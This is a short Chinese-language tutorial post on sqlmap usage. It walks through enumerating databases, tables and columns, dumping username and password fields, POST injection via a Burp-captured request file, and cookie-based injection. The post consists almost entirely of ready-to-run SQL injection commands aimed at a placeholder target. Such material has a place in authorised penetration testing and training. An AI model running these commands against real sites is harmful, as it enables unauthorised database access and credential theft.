第一篇

sqlmap基本用法

sqlmap的使用是基于我们已经通过手工注入的方法简单判断出注入类型，然后我们通过不同的参数来制定不同的payload。
下面的是最简单的联合查询注入

列举数据库
sqlmap.py -u "注入地址" --dbs
列举库中的表名
sqlmap.py -u "注入地址" -D 库名 --tables
列举表的列名
sqlmap.py -u "注入地址" -D 库名 -T 表名 --columns
列举字段内容
sqlmap.py -u "注入地址" -D 库名 -T 表名 -C "id,username,password" --dump(字段可以是自己想要的内容)

sqlmap post注入

我们在使用post注入时，有时会出现请求遗漏而导致注入失败的情况。这里可以使用burpsuit结合sqlmap来进行post注入
步骤如下：

1.浏览器打开目标网站
2.配置burp代理
3.点击提交表单的按钮
4.这时候burp会拦截我们的post请求
5.把post请求复制为txt文件,假设命名为666.txt，位置为：C:\Users\user\Desktop\666.txt
6.运行sqlmap输入命令：sqlmap.py -r “C:\Users\user\Desktop\666.txt”
之后会爆出数据库名，然后后面的操作就和基础注入类似了
这时爆库，爆表等操作和上面的基础注入方类似，只是多了-p指定参数

sqlmap cookie注入

默认情况下，sqlmap只支持get/post类型的注入，但当使用–level参数且值大于等于2时，也会检查cookie里的参数

sqlmap.py -u 注入点URL --cookie"id=xx" --level 3
sqlmap.py -u url --cookie "id=xx"--level 3 --tables(猜表名)
sqlmap.py -u url --cookie "id=xx"--level 3 -T 表名 --columns
sqlmap.py -u url --cookie "id=xx"--level 3 -T 表名 -C username，password --dump

---

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 cxaqhq@qq.com